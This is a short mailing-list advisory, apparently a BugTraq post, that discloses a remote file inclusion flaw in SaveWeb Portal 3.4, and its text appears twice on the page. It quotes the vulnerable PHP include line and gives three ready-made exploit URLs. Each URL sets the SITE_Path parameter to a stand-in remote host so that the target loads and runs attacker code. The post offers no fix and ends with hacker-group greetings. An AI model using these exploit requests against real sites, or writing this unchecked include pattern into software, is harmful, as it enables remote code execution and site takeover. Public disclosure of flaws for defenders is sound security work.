BugTraq
Back to list
|
Post reply
SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
Aug 02 2006 11:19AM
x0r0n hotmail com
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\
#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: SaveWeb Portal
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE: include($SITE_Path."poll/poll.php")
-
#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scr
ipts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: SaveWeb Portal
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE: include($SITE_Path."poll/poll.php")
-
#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scr
ipts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\
[ reply ]